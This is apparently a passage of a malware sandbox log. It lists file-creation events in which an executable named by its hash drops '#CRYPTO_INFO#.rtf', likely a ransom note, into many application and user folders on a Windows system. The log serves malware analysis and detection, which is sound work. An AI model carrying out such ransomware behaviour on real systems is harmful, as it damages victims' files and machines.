C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\ProgramData\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files-select\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\DesktopView_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ko\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\Pictures\Saved Pictures\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\_platform_specific\win_x64\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\am-ET\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\Reader\DesktopNotification\NotificationsDB\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\index-dir\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\All Users\Microsoft\Network\Downloader\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000D4A5\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\cs\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ca\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\tr-tr\#CRYPTO_INFO#.rtf 